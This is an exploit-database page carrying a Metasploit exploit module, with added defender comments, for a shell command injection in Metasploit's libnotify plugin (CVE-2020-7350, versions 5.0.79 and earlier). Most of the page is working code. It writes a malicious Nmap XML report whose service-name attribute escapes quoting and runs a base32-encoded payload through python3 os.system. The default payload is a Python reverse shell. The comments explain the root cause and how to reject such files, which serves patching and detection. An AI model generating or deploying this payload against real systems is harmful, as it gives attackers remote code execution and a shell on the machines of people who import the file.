Metasploit Libnotify Arbitrary Command Execution

2020.04.18
Credit: pasta
Risk: High
Local: No
Remote: Yes
CVE: N/A (the module's own References list CVE-2020-7350)
CWE: CWE-78

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# File-format module that writes an Nmap-style XML report (option FILENAME,
# default 'scan.xml') in which one <service name="..."> attribute carries a
# shell command. Per the module description it targets a shell command
# injection (CWE-78) in the Metasploit libnotify plugin, affecting Metasploit
# 5.0.79 and earlier; the References below cite CVE-2020-7350.
#
# Reading this as a defender:
# - Root-cause class: a field taken from an imported scan report ends up in a
#   shell command line without escaping. The durable fix pattern is to invoke
#   the notifier with an argument vector (no shell) or to shell-escape every
#   interpolated field.
#   NOTE(review): the plugin's code is not shown on this page; confirm the
#   exact sink against the linked issue.
# - Report files received from anyone else are untrusted input; installations
#   at or below the version named in the description should be upgraded
#   before importing such files with the plugin loaded.
# - Triage hint: service `name` values in Nmap XML are normally short protocol
#   identifiers, so quotes, `;`, `&` or whitespace inside that attribute are
#   grounds to reject the file before import.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  # Registers the module metadata and the single FILENAME option.
  #
  # info - Hash of metadata passed through update_info and merged with the
  #        values below.
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Metasploit Libnotify Plugin Arbitrary Command Execution',
      'Description' => %q( This module exploits a shell command injection vulnerability in the libnotify plugin. This vulnerability affects Metasploit versions 5.0.79 and earlier. ),
      'DisclosureDate' => 'Mar 04 2020',
      'License' => GPL_LICENSE,
      'Author' => [
        'pasta <jaguinaga@faradaysec.com>' # Discovery and PoC
      ],
      'References' => [
        [ 'CVE', '2020-7350' ],
        [ 'URL', 'https://github.com/rapid7/metasploit-framework/issues/13026' ]
      ],
      # The payload is a unix command string (ARCH_CMD), not machine code.
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Payload' => { 'DisableNops' => true },
      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_python' },
      'Targets' => [[ 'Automatic', {}]],
      'Privileged' => false,
      'DefaultTarget' => 0))
    # FILENAME is declared optional (false) and defaults to 'scan.xml'.
    register_options(
      [
        OptString.new('FILENAME', [false, 'The file to write.', 'scan.xml']),
      ]
    )
  end

  # Builds the XML report as a single string literal and writes it out.
  #
  # Everything in the literal is fixed sample scan data except the service
  # `name` attribute, where payload.encoded is interpolated in base32 form
  # (Rex::Text.encode_base32) inside a python3 one-liner that decodes it and
  # passes it to os.system. The attribute value is bracketed by single-quote
  # characters at both ends, which suggests the consuming code places the value
  # inside single quotes -- TODO confirm against the linked issue. Those quote
  # and `;`/`&` characters are what input validation on the importing side has
  # to neutralise.
  def exploit
    xml = %(<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE nmaprun> <nmaprun scanner="nmap" args="nmap -P0 -oA pepito 192.168.20.121" start="1583503480" startstr="Fri Mar 6 11:04:40 2020" version="7.60" xmloutputversion="1.04"> <host starttime="1583503480" endtime="1583503480"><status state="up" reason="user-set" reason_ttl="0"/> <address addr="192.168.20.121" addrtype="ipv4"/> <hostnames> </hostnames> <ports> <port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh';python3 -c &quot;import os,base64;os.system(base64.b32decode(b'#{Rex::Text.encode_base32(payload.encoded)}'.upper()))&quot;&amp;; printf '" method="table" conf="3"/></port> </ports> <times srtt="6174" rttvar="435" to="100000"/> </host> <runstats><finished time="1583503480" timestr="Fri Mar 6 11:04:40 2020" elapsed="0.22" summary="Nmap done at Fri Mar 6 
11:04:40 2020; 1 IP address (1 host up) scanned in 0.22 seconds" exit="success"/><hosts up="1" down="0" total="1"/> </runstats> </nmaprun> )
    print_status "Writing xml file: #{datastore['FILENAME']}"
    # file_create is not defined in this file; presumably it is supplied by the
    # FILEFORMAT mixin included above and writes the string to FILENAME.
    file_create xml
  end
end

